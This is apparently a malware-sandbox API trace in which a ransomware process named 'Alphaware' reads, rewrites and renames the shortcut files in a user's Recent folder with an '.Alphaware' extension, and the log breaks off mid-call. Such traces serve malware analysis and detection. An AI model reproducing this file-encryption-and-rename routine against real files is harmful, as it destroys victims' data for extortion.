SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1dc7CK 8O2M4jV0-v99j.lnk", dwFileAttributes=0x80) returned 1 [0094.707] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1dc7CK 8O2M4jV0-v99j.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1dc7ck 8o2m4jv0-v99j.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2466b90 | out: lpFileInformation=0x2466b90*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd15278c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15278c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15278c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa25)) returned 1 [0094.707] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1dc7CK 8O2M4jV0-v99j.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1dc7ck 8o2m4jv0-v99j.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.708] ReadFile (in: hFile=0x250, lpBuffer=0x24678e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24678e8*, lpNumberOfBytesRead=0x23e958*=0xa25, lpOverlapped=0x0) returned 1 [0094.732] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1dc7CK 8O2M4jV0-v99j.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1dc7ck 8o2m4jv0-v99j.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.735] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1dc7CK 8O2M4jV0-v99j.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1dc7ck 8o2m4jv0-v99j.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15278c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15278c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aa9de40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe60)) returned 1 [0094.735] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1dc7CK 8O2M4jV0-v99j.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1dc7ck 8o2m4jv0-v99j.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1dc7CK 8O2M4jV0-v99j.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1dc7ck 8o2m4jv0-v99j.lnk.alphaware")) returned 1 [0094.736] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1wWkN7zA3pJvJ0l2.pdf.lnk", dwFileAttributes=0x80) returned 1 [0094.737] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1wWkN7zA3pJvJ0l2.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1wwkn7za3pjvj0l2.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24ed6a0 | out: lpFileInformation=0x24ed6a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfe3e500, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfe3e500, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfe3e500, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x139b)) returned 1 [0094.737] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1wWkN7zA3pJvJ0l2.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1wwkn7za3pjvj0l2.pdf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.737] ReadFile (in: hFile=0x250, lpBuffer=0x24ed9b8, nNumberOfBytesToRead=0x139b, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24ed9b8*, lpNumberOfBytesRead=0x23e958*=0x139b, lpOverlapped=0x0) returned 1 [0094.765] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1wWkN7zA3pJvJ0l2.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1wwkn7za3pjvj0l2.pdf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.768] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1wWkN7zA3pJvJ0l2.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1wwkn7za3pjvj0l2.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe3e500, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfe3e500, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aaea100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1af4)) returned 1 [0094.768] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1wWkN7zA3pJvJ0l2.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1wwkn7za3pjvj0l2.pdf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1wWkN7zA3pJvJ0l2.pdf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\1wwkn7za3pjvj0l2.pdf.lnk.alphaware")) returned 1 [0094.804] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Ahm.lnk", dwFileAttributes=0x80) returned 1 [0094.805] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Ahm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2ahm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ec8e0 | out: lpFileInformation=0x23ec8e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd122dd40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd122dd40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd122dd40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x97c)) returned 1 [0094.805] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Ahm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2ahm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.805] ReadFile (in: hFile=0x250, lpBuffer=0x23ed4f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23ed4f8*, lpNumberOfBytesRead=0x23e958*=0x97c, lpOverlapped=0x0) returned 1 [0094.827] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Ahm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2ahm.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.829] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Ahm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2ahm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122dd40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd122dd40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ab82680, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd74)) returned 1 [0094.829] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Ahm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2ahm.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Ahm.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2ahm.lnk.alphaware")) returned 1 [0094.831] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2cvjqDL8AbrH.lnk", dwFileAttributes=0x80) returned 1 [0094.831] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2cvjqDL8AbrH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2cvjqdl8abrh.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2472af0 | out: lpFileInformation=0x2472af0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfb44980, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb44980, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb44980, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3c5)) returned 1 [0094.831] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2cvjqDL8AbrH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2cvjqdl8abrh.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.831] ReadFile (in: hFile=0x250, lpBuffer=0x2473190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2473190*, lpNumberOfBytesRead=0x23e958*=0x3c5, lpOverlapped=0x0) returned 1 [0094.854] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2cvjqDL8AbrH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2cvjqdl8abrh.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.856] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2cvjqDL8AbrH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2cvjqdl8abrh.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb44980, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb44980, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8abce940, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5e0)) returned 1 [0094.857] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2cvjqDL8AbrH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2cvjqdl8abrh.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2cvjqDL8AbrH.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2cvjqdl8abrh.lnk.alphaware")) returned 1 [0094.858] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2XrQR lLdHFDJW8qX.lnk", dwFileAttributes=0x80) returned 1 [0094.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2XrQR lLdHFDJW8qX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2xrqr lldhfdjw8qx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24f4630 | out: lpFileInformation=0x24f4630*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfeb0920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfeb0920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfeb0920, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3de)) returned 1 [0094.858] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2XrQR lLdHFDJW8qX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2xrqr lldhfdjw8qx.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.858] ReadFile (in: hFile=0x250, lpBuffer=0x24f4d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24f4d08*, lpNumberOfBytesRead=0x23e958*=0x3de, lpOverlapped=0x0) returned 1 [0094.880] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2XrQR lLdHFDJW8qX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2xrqr lldhfdjw8qx.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.884] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2XrQR lLdHFDJW8qX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2xrqr lldhfdjw8qx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfeb0920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfeb0920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ac1ac00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f4)) returned 1 [0094.885] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2XrQR lLdHFDJW8qX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2xrqr lldhfdjw8qx.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2XrQR lLdHFDJW8qX.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2xrqr lldhfdjw8qx.lnk.alphaware")) returned 1 [0094.886] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Y7NVeZda.lnk", dwFileAttributes=0x80) returned 1 [0094.886] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Y7NVeZda.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2y7nvezda.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2576240 | out: lpFileInformation=0x2576240*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd10b0f80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10b0f80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd10b0f80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1342)) returned 1 [0094.886] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Y7NVeZda.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2y7nvezda.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.887] ReadFile (in: hFile=0x250, lpBuffer=0x25764f8, nNumberOfBytesToRead=0x1342, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25764f8*, lpNumberOfBytesRead=0x23e958*=0x1342, lpOverlapped=0x0) returned 1 [0094.912] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Y7NVeZda.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2y7nvezda.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.915] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Y7NVeZda.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2y7nvezda.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10b0f80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10b0f80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ac66ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a88)) returned 1 [0094.915] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Y7NVeZda.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2y7nvezda.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2Y7NVeZda.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\2y7nvezda.lnk.alphaware")) returned 1 [0094.916] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\36j-o6P YBS6oejEQ.mkv.lnk", dwFileAttributes=0x80) returned 1 [0094.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\36j-o6P YBS6oejEQ.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\36j-o6p ybs6oejeq.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2403560 | out: lpFileInformation=0x2403560*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfd0da00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd0da00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfd0da00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x12d8)) returned 1 [0094.917] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\36j-o6P YBS6oejEQ.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\36j-o6p ybs6oejeq.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.917] ReadFile (in: hFile=0x250, lpBuffer=0x2403860, nNumberOfBytesToRead=0x12d8, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2403860*, lpNumberOfBytesRead=0x23e958*=0x12d8, lpOverlapped=0x0) returned 1 [0094.940] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\36j-o6P YBS6oejEQ.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\36j-o6p ybs6oejeq.mkv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.942] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\36j-o6P YBS6oejEQ.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\36j-o6p ybs6oejeq.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd0da00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd0da00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ac8d020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19f4)) returned 1 [0094.942] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\36j-o6P YBS6oejEQ.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\36j-o6p ybs6oejeq.mkv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\36j-o6P YBS6oejEQ.mkv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\36j-o6p ybs6oejeq.mkv.lnk.alphaware")) returned 1 [0094.944] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4A87C_8NPb.lnk", dwFileAttributes=0x80) returned 1 [0094.944] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4A87C_8NPb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4a87c_8npb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x248f2c0 | out: lpFileInformation=0x248f2c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd108ae20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd108ae20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd108ae20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9b7)) returned 1 [0094.944] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4A87C_8NPb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4a87c_8npb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.944] ReadFile (in: hFile=0x250, lpBuffer=0x248ff48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x248ff48*, lpNumberOfBytesRead=0x23e958*=0x9b7, lpOverlapped=0x0) returned 1 [0094.967] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4A87C_8NPb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4a87c_8npb.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.970] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4A87C_8NPb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4a87c_8npb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd108ae20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd108ae20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8acd92e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdc8)) returned 1 [0094.970] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4A87C_8NPb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4a87c_8npb.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4A87C_8NPb.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\4a87c_8npb.lnk.alphaware")) returned 1 [0094.971] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4iWuq2Z09OQUcI.flv.lnk", dwFileAttributes=0x80) returned 1 [0094.971] GetFileAttributesExW (in: 